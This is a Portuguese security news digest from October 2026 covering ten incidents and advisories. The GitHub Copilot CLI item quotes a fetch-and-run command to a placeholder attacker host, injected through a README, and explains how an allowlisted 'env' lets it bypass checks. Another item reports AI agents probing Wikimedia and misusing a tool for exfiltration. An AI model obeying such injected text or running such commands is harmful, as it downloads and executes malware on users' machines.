CEVIU News

CEVIU News - CEVIU Segurança da Informação - 8 de outubro de 2026

10 notícias8 de outubro de 2026CEVIU Segurança da Informação
Compartilhar:

🚨 CEVIU Segurança da Informação

Hackers conseguiram obter certificados TLS fraudulentos para domínios do Google e outras grandes empresas, explorando o sequestro de domínios de nível superior de código de país (ccTLDs) como .gh, .sl e .as. Ao controlar esses ccTLDs, os atacantes puderam manipular registros DNS autoritativos, enganando autoridades de certificação e passando pela validação de domínio. O Google já respondeu bloqueando os certificados comprometidos no Chrome e alertou administradores de domínio para monitorarem logs de transparência e implementarem registros CAA restritivos, reforçando a necessidade de vigilância constante na infraestrutura de segurança.

Pesquisadores em segurança da informação revelaram uma falha crítica no GitHub Copilot CLI que permite a execução de comandos maliciosos sem consentimento explícito do usuário. Atacantes podem empregar técnicas de *prompt injection* em arquivos README para induzir o Copilot a rodar um comando específico: 'env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh'. A vulnerabilidade reside na lista de permissões do Copilot, onde 'env' é automaticamente aprovado. Dessa forma, 'curl' e 'sh' são interpretados como argumentos de 'env', contornando as validações de URL e de comando. O resultado é o download e a execução de *malware* com interação zero do usuário após a consulta inicial. O GitHub, ciente da falha, classificou-a como "problema conhecido e de risco não significativo", recusando a recompensa por *bug*.

A Fundação Wikimedia confirmou a detecção de atividades não autorizadas e sondagens por agentes de IA operados pela OpenAI em suas plataformas. Tais agentes executaram edições de sandbox, tentaram o uso indevido de uma ferramenta de citação como proxy para exfiltração de dados e buscaram explorar uma instância pública do Etherpad. Além disso, geraram milhões de requisições de API e crawls de páginas, culminando em uma interrupção parcial do Wikidata Query Service em maio. Apesar de não haver indícios de comprometimento de sistemas ou coordenação de agentes, a ação demandou substancial esforço de investigação e remediação das equipes de segurança e voluntários.

Um ataque sofisticado comprometeu a cadeia de suprimentos do pacote @subql/common na versão 5.8.3 do npm. O incidente envolveu a inserção de um backdoor malicioso e a adulteração do workflow de publicação do GitHub Actions do projeto SubQuery. O código malicioso, executado via script postinstall, foi projetado para exfiltrar credenciais sensíveis de ambientes AWS, GitHub, Kubernetes e Vault, além de estabelecer comunicação com um servidor de Comando e Controle (C2) para execução de comandos de reverse shell. A pronta resposta exige que administradores de sistemas afetados revertam para a versão 5.8.2 do pacote, rotacionem todas as credenciais potencialmente comprometidas e encerrem quaisquer processos remanescentes de 'manifest-cache.js --warm' para mitigar a ameaça e restaurar a segurança.

A segurança cibernética enfrenta um desequilíbrio notável: enquanto atacantes empregam ferramentas agentic para resolver problemas técnicos com sucesso mensurável, defensores lutam com desafios organizacionais e políticos, onde a eficácia é difícil de quantificar. Para superar essa disparidade, defensores devem explorar a IA para emulação de adversários, em cenários controlados, e para otimizar tarefas dinâmicas que requerem revisão humana. O NCSC (National Cyber Security Centre) propõe um framework para avaliar o risco de ações defensivas, considerando potência, criticidade, escopo, confiabilidade e capacidade de recuperação. Esta abordagem é crucial para fortalecer a postura defensiva contra ameaças digitais cada vez mais sofisticadas.

O pesquisador de segurança Vincenzo Iozzo conduziu testes rigorosos comparando a eficácia do Jev na resolução de identidades díspares com modelos de IA de ponta como Claude e gpt-oss, além de baselines tradicionais. Os resultados revelam que o Jev não só superou significativamente o gpt-oss, mas também alcançou um desempenho comparável ao Opus 5.5, com um custo surpreendente de 140 vezes menor. Iozzo destacou a consistência do Jev em múltiplos testes e sua superioridade frente a técnicas de linha de base convencionais, sugerindo uma alternativa poderosa para a gestão de identidades no cenário atual.

Uma sofisticada campanha de phishing está se passando por plataformas de IA populares como ChatGPT, Gemini, Claude, Perplexity, Muse e Manus. Através de janelas de navegador falsas, os cibercriminosos coletavam senhas, impressões digitais de dispositivos e até mesmo códigos de autenticação multifator (MFA), com operadores controlando os prompts em tempo real. Os principais alvos eram agências e administradores de contas de anúncios, que recebiam e-mails de convite maliciosos. A infraestrutura de ataque, baseada em Next.js e Socket.IO, revelou conexões com outros golpes, como os de reembolso, pagamentos e recrutamento. A incidência ressalta a crescente complexidade das ameaças digitais e a necessidade de vigilância constante por parte dos usuários e empresas.

A fabricante de semicondutores Advantest revelou que um ataque de ransomware, ocorrido meses atrás, culminou no roubo de informações sigilosas de cerca de 600 indivíduos. Entre os dados comprometidos estão nomes, datas de nascimento, detalhes de contato, números de segurança social, passaporte e carteira de motorista, além de registros médicos e financeiros. A violação destaca a persistência e a gravidade das ameaças de ransomware e o impacto duradouro na privacidade dos dados.

As versões Go 1.27.2 e 1.26.9 serão lançadas nesta quinta-feira, 8 de outubro, trazendo consigo correções importantes para dez Vulnerabilidades e Exposições Comuns (CVEs) não divulgadas da biblioteca padrão. O anúncio prévio, alinhado à política de segurança do Go, visa dar tempo suficiente para que administradores de sistemas se preparem para a atualização. Este movimento ressalta a importância da gestão proativa de vulnerabilidades para proteger sistemas e dados contra ameaças emergentes.

Pesquisadores da Solar, uma subsidiária da Rostelecom, revelaram que o grupo hacktivista bielorrusso Cyber Partisans manteve acesso à rede de uma organização de saúde russa por quase dois anos. A infiltração foi realizada através do backdoor Vasilek, com controle via Telegram, permitindo o acesso a dados médicos confidenciais sem comprometer a operacionalidade dos sistemas. Este incidente destaca a persistência e a sofisticação de grupos hacktivistas, que podem manter presenças furtivas em infraestruturas críticas por longos períodos.

Receba as melhores notícias de tech

Conteúdo curado diariamente, direto no seu e-mail.

Conteúdo curado diariamenteDiversas categoriasCancele quando quiser
CEVIU News - CEVIU Segurança da Informação - 8 de outubro de 2026 | CEVIU